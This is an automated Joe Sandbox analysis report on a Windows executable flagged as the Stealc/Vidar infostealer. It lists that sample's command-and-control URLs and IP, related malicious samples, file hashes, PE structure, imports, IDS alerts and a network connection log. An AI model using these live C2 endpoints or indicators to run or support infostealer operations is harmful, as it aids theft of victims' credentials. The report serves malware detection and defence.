http://95.215.207.176/d8ddb681db736e16.phpS | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://95.215.207.176/d8ddb681db736e16.php& | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://95.215.207.176/d8ddb681db736e16.phpf | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://95.215.207.176/d8ddb681db736e16.phpH | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://95.215.207.176 | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://95.215.207.176/$ | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://95.215.207.176/ws | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.4.dr | false | URL Reputation: safe | unknown
http://95.215.207.176/d8ddb681db736e16.phpV | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://95.215.207.176/d8ddb681db736e16.php: | lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
95.215.207.176 | unknown | Ukraine | | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546917
Start date and time: 2024-11-01 17:43:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: lxEu3xfjIb.exe
renamed because original name is a hash value
Original Sample Name: bb99cde9173ee6e21b61963f6a4a60da.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 23
• Number of non-executed functions: 199
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: lxEu3xfjIb.exe
Time | Type | Description
12:44:23 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
95.215.207.176 | mFRLWyUa7u.exe | malicious | Stealc | 95.215.207.176/d8ddb681db736e16.php
95.215.207.176 | xLgTQcFdIJ.exe | malicious | Stealc, Vidar | 95.215.207.176/d8ddb681db736e16.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | mFRLWyUa7u.exe | malicious | Stealc | 95.215.207.176
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | xLgTQcFdIJ.exe | malicious | Stealc, Vidar | 95.215.207.176
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | XJQkTVvJ3I.exe | malicious | Stealc | 185.235.128.16
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | WGo3ga1AL9.exe | malicious | Stealc, Vidar | 185.235.128.16
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | I43xo3KKfS.exe | malicious | Stealc | 45.88.105.105
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | Ky4J8k89A7.exe | malicious | Stealc, Vidar, Xmrig | 45.88.105.105
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | b4s45TboUL.exe | malicious | Stealc, Vidar | 45.91.200.39
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | qPNf2kJgzI.exe | malicious | Stealc | 45.91.200.39
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | tdnPqG0jmS.exe | malicious | Stealc, Vidar | 45.91.200.39
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | y3c6AzPbtt.exe | malicious | Stealc | 45.88.105.194
No context
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9625697521222515
Encrypted: false
SSDEEP: 96:7aE6AMYGs1hCH7nfSQXIDcQmc6ccEZcw3KH+HbHg/wWGTf3hOycaGHh4vXNtZruP:WHYGL0oYjnjsqZrP2izuiF/Z24IO8L
MD5: F534E5C56DED81C019095ED874DD802D
SHA1: B6DEE9F5C9D4163113F684DCBC8FE8FCCAB361DA
SHA-256: A00BC6742A560DEEEABF25D954E09076DF9102070F42AEFF0E098B118348B19A
SHA-512: 257E8E695D2B853DD0F2321B98B9C79229B8FDF2F91947734F65BADF5401797986F2AB4A936121D0CF5FCF38FD91A7C8403A6C9E5DCBAFF913A43E4D0B7E5ACF
Malicious: true
Reputation: low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.5.3.0.4.5.4.9.1.8.0.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.5.3.0.4.5.9.1.3.6.7.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.a.f.8.d.3.d.-.2.4.0.8.-.4.6.1.0.-.9.4.b.c.-.e.9.8.3.b.4.f.b.0.0.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.3.f.7.4.c.2.-.6.c.0.d.-.4.f.c.d.-.b.8.f.9.-.7.e.c.9.b.7.3.9.c.5.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.x.E.u.3.x.f.j.I.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.c.-.0.0.0.1.-.0.0.1.4.-.a.f.3.0.-.4.6.4.0.7.d.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.e.4.1.1.d.0.7.d.f.5.7.0.c.1.8.d.9.0.0.f.2.0.3.9.7.5.9.a.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.2.b.c.f.f.0.e.b.a.6.9.c.4.5.9.2.e.4.d.2.9.5.9.e.8.a.2.e.3.5.f.c.3.5.4.1.6.3.3.8.!.l.x.E.u.3.x.f.j.I.b...e.x.e.....T.a.r.g.e.t.A.p.p.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Fri Nov 1 16:44:05 2024, 0x1205a4 type
Category: dropped
Size (bytes): 61886
Entropy (8bit): 1.8466896978949758
Encrypted: false
SSDEEP: 192:Id7XfWAKHXWeOgOJwafPqTcotE7rwTyRyp5CzCAA/ncQG8Xwi7dGFPSkGrucL6r:8SAKmZgE9fPq/tKJ0fTXwZlU9Wr
MD5: 4D9C631A329B7C49FE8B1A55F7D7AE51
SHA1: 7D9F9AA5A0EB04062FB4126A2E2977B6B9D80F91
SHA-256: 4D7261CB61375CE499C4C07B226E782C079825080930C45A3154E4DEECA4E533
SHA-512: CED4B8D4A67505B5882BD7884BB91749E97CEAADE0E52D7947587E18F5D70E4CFE8350DA974F213A77DB4044F10E410896D81B763DF2F15DE26FE0232AE01CF1
Malicious: false
Reputation: low
                                            Preview:MDMP..a..... .......U.%g............4...............<............*..........T.......8...........T...........P3..n.......................................................................................................eJ......H.......GenuineIntel............T...........O.%g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8340
Entropy (8bit): 3.7034730559417435
Encrypted: false
SSDEEP: 192:R6l7wVeJ5w6ZOu6YEIxSU9m/FPgmfRPpDG89b1Asfbnm:R6lXJ+656YEeSU9mtgmfRV1Tfy
MD5: 56171415A96F6A311EEA419D95850D2C
SHA1: A8D9CDFBC22D457BCC4041D044DDACCD1106A8A5
SHA-256: DD4DB1FF1EAD087F4409140517B0071EB5B2F76314EE971AF2DF6725B74C5589
SHA-512: 17388971416E827842785A0BC18CC3241D8117C03DABCD77E8ABFCA1857BC3F1680AC60A4CEF3D9C9DD2FA201DE5C71B35A1B7911080DF6B150B7A075A3CE7EA
Malicious: false
Reputation: low
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4579
Entropy (8bit): 4.471732731551321
Encrypted: false
SSDEEP: 48:cvIwWl8zs0AiJg77aI9NyWpW8VYcsYm8M4JnyEF1+q86OmWixKEd:uIjf0AwI77T7VHJy8SmdxKEd
MD5: 66FE51B764CA53EC0EFFE9F1FE0337B3
SHA1: 1D50B5F486D97B19E0BC9418C880A8064DDEF475
SHA-256: 398E197901475E311E317118799CA27F2FA6FFF41C52EEF5CE972626990453C2
SHA-512: 03E9FA52A03C8F4E0D693A217656B0FA1DBAACC501D2328D809192975AA0547F7F60C59C4E7B752817A53A8F7D13A5E5817447BBA7D2058C08F39A546E2F04F5
Malicious: false
Reputation: low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="569266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.42155792569965
Encrypted: false
SSDEEP: 6144:kSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNo0uhiTw:vvloTMW+EZMM6DFyK03w
MD5: F3551C273258A2C306551F7370EC36C3
SHA1: A2469E4F444FB0683A94E6A5FD0344438292CC92
SHA-256: 3B5831B8BC5F0B77119B85C014245C18EE5AFEB5F1161CE343E493FC97B1EFEA
SHA-512: 9A3B1250F748B9BCAC71D70DCDA996FFEFF4FE52B44E492BF17BB8ABA13732F123D1BF403E1672C0AE76426B0E1303DA84CE4EB39F9B3C12C1C7584E6E51BDF1
Malicious: false
Reputation: low
                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.C},.................................................................................................................................................................................................................................................................................................................................................w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.55271434359143
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: lxEu3xfjIb.exe
File size: 649'728 bytes
MD5: bb99cde9173ee6e21b61963f6a4a60da
SHA1: 2bcff0eba69c4592e4d2959e8a2e35fc35416338
SHA256: c40ada473bd3a23569dd60807fa9754f2917c029e28746e7c1a32568d801dbfe
SHA512: 751fe655c94c9fd218e6e51b7a4c36f88b4aec925fd76ec2093796752f05fc4fcc6d9dc840fc35e4d13fdd7fc24aab775798f06b18e311e8d615327612df5620
SSDEEP: 12288:WDmwmgSvGScINm25Vzup9YL59eROPByNS6c3fA46Kk:omfgSvwMkQCO8Y6OfA46Kk
TLSH: 4ED4F120B6F19C36F7F756309934A5C45FFBF963A971819E221C265E1E322A08EE4713
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W}..6.Z.6.Z.6.Z4y.Z.6.Z.d.Z.6.Z.d.Z.6.Z.d.Z.6.Z..hZ.6.Z.6.Z.6.Z.d.Z.6.Z.d.Z.6.Z.d.Z.6.ZRich.6.Z........PE..L......e...........
                                            Icon Hash:738733b18bab8be0
                                            Entrypoint:0x4017d7
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x65C088D1 [Mon Feb 5 07:05:53 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:9ed146f7c8ff1a04625e34c1f119649c
                                            Instruction
                                            call 00007FD71CE748C3h
                                            jmp 00007FD71CE70D4Dh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [0048C798h], eax
                                            mov dword ptr [0048C794h], ecx
                                            mov dword ptr [0048C790h], edx
                                            mov dword ptr [0048C78Ch], ebx
                                            mov dword ptr [0048C788h], esi
                                            mov dword ptr [0048C784h], edi
                                            mov word ptr [0048C7B0h], ss
                                            mov word ptr [0048C7A4h], cs
                                            mov word ptr [0048C780h], ds
                                            mov word ptr [0048C77Ch], es
                                            mov word ptr [0048C778h], fs
                                            mov word ptr [0048C774h], gs
                                            pushfd
                                            pop dword ptr [0048C7A8h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [0048C79Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [0048C7A0h], eax
                                            lea eax, dword ptr [ebp+08h]
                                            mov dword ptr [0048C7ACh], eax
                                            mov eax, dword ptr [ebp-00000320h]
                                            mov dword ptr [0048C6E8h], 00010001h
                                            mov eax, dword ptr [0048C7A0h]
                                            mov dword ptr [0048C69Ch], eax
                                            mov dword ptr [0048C690h], C0000409h
                                            mov dword ptr [0048C694h], 00000001h
                                            mov eax, dword ptr [0048B004h]
                                            mov dword ptr [ebp-00000328h], eax
                                            mov eax, dword ptr [0048B008h]
                                            mov dword ptr [ebp-00000324h], eax
                                            call dword ptr [000000ECh]
                                            Programming Language:
                                            • [C++] VS2008 build 21022
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8994c | 0x28 | .rdata
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2791000 | 0x10bc8 | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x88000 | 0x1a0 | .rdata
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                             .text | 0x1000 | 0x868bc | 0x86a00 | f327d8fd11f9d291a192cf424d58b261 | False | 0.9234962569637883 | data | 7.84625610084164 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rdata | 0x88000 | 0x22ce | 0x2400 | c590705db7e604ce530136ad6100d294 | False | 0.3568793402777778 | data | 5.452585743934992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .data | 0x8b000 | 0x2705398 | 0x4c00 | 5c4577ebe96d0ed3fff76ebd735f345d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .rsrc | 0x2791000 | 0x10bc8 | 0x10c00 | 25a81e3336dc5562d2b40e287683b7d7 | False | 0.44891266324626866 | DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2658455991569831745807614120560689152.000000, slope 10676176172832952127534461336334368768.000000 | 5.022819364958824 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                             JUPILAMADUSAGIGIXOYANEXUF | 0x279bd48 | 0x3fa | ASCII text, with very long lines (1018), with no line terminators | Turkish | Turkey | 0.6237721021611002
                                             KIZEWEJAJUDIM | 0x279b150 | 0xbf7 | ASCII text, with very long lines (3063), with no line terminators | Turkish | Turkey | 0.6010447273914463
                                             RT_ICON | 0x2791750 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.3296908315565032
                                             RT_ICON | 0x27925f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5112815884476535
                                             RT_ICON | 0x2792ea0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.5506912442396313
                                             RT_ICON | 0x2793568 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.5845375722543352
                                             RT_ICON | 0x2793ad0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkish | Turkey | 0.4220954356846473
                                             RT_ICON | 0x2796078 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.4979508196721312
                                             RT_ICON | 0x2796a00 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.500886524822695
                                             RT_ICON | 0x2796ed0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.38646055437100213
                                             RT_ICON | 0x2797d78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5392599277978339
                                             RT_ICON | 0x2798620 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6094470046082949
                                             RT_ICON | 0x2798ce8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6380057803468208
                                             RT_ICON | 0x2799250 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.40126641651031897
                                             RT_ICON | 0x279a2f8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.39344262295081966
                                             RT_ICON | 0x279ac80 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.4370567375886525
                                             RT_STRING | 0x279c2f0 | 0x144 | data | | | 0.5216049382716049
                                             RT_STRING | 0x279c438 | 0x850 | AmigaOS bitmap font "e", fc_YSize 26880, 20480 elements, 2nd "i", 3rd "v" | | | 0.4149436090225564
                                             RT_STRING | 0x279cc88 | 0x3e0 | data | | | 0.4637096774193548
                                             RT_STRING | 0x279d068 | 0x31e | data | | | 0.4799498746867168
                                             RT_STRING | 0x279d388 | 0x598 | data | | | 0.4483240223463687
                                             RT_STRING | 0x279d920 | 0x680 | data | | | 0.4387019230769231
                                             RT_STRING | 0x279dfa0 | 0x5ea | data | | | 0.43593130779392336
                                             RT_STRING | 0x279e590 | 0x7f0 | data | | | 0.4237204724409449
                                             RT_STRING | 0x279ed80 | 0x69c | data | | | 0.43498817966903075
                                             RT_STRING | 0x279f420 | 0x6f0 | data | | | 0.42849099099099097
                                             RT_STRING | 0x279fb10 | 0x5e6 | data | | | 0.44437086092715233
                                             RT_STRING | 0x27a00f8 | 0x7ec | data | | | 0.4176528599605523
                                             RT_STRING | 0x27a08e8 | 0x60c | data | | | 0.43733850129198965
                                             RT_STRING | 0x27a0ef8 | 0x680 | data | | | 0.43209134615384615
                                             RT_STRING | 0x27a1578 | 0x64c | data | | | 0.4280397022332506
                                             RT_GROUP_ICON | 0x2796e68 | 0x68 | data | Turkish | Turkey | 0.7115384615384616
                                             RT_GROUP_ICON | 0x279b0e8 | 0x68 | data | Turkish | Turkey | 0.7115384615384616
                                             RT_VERSION | 0x279c148 | 0x1a4 | data | | | 0.5785714285714286
                                             DLL | Import
                                             KERNEL32.dll | SetProcessAffinityMask, SetDefaultCommConfigA, GetNumaProcessorNode, GetLocaleInfoA, DebugActiveProcessStop, CallNamedPipeA, InterlockedIncrement, MoveFileExW, GlobalSize, GetEnvironmentStringsW, Process32First, GlobalLock, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, GlobalAlloc, GetSystemWow64DirectoryW, GetConsoleAliasExesLengthW, GetStringTypeExW, HeapCreate, GetTimeFormatW, GetConsoleAliasW, SetConsoleCursorPosition, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetACP, GetStartupInfoA, GetStdHandle, GetLogicalDriveStringsA, SetLastError, GetProcAddress, SetVolumeLabelW, MoveFileW, VirtualAllocEx, BuildCommDCBW, LoadLibraryA, InterlockedExchangeAdd, OpenWaitableTimerW, SetCommMask, FindAtomA, SetNamedPipeHandleState, GetModuleHandleA, OpenFileMappingW, GetVersionExA, ReadConsoleOutputCharacterW, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapFree, VirtualAlloc, WriteFile, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                             Language of compilation system | Country where language is spoken
                                             Turkish | Turkey
                                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                             2024-11-01T17:44:05.331408+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 95.215.207.176 | 80 | TCP
                                             2024-11-01T17:44:19.423355+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 49720 | TCP
                                             2024-11-01T17:44:47.675345+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 59725 | TCP
                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                             Nov 1, 2024 17:44:04.262813091 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Nov 1, 2024 17:44:04.267788887 CET | 80 | 49704 | 95.215.207.176 | 192.168.2.5
                                             Nov 1, 2024 17:44:04.267863989 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Nov 1, 2024 17:44:04.270138025 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Nov 1, 2024 17:44:04.275166988 CET | 80 | 49704 | 95.215.207.176 | 192.168.2.5
                                             Nov 1, 2024 17:44:05.085376024 CET | 80 | 49704 | 95.215.207.176 | 192.168.2.5
                                             Nov 1, 2024 17:44:05.085438013 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
                                             Nov 1, 2024 17:44:05.091948986 CET | 49704 | 80 | 192.168.2.5 | 95.215.207.176
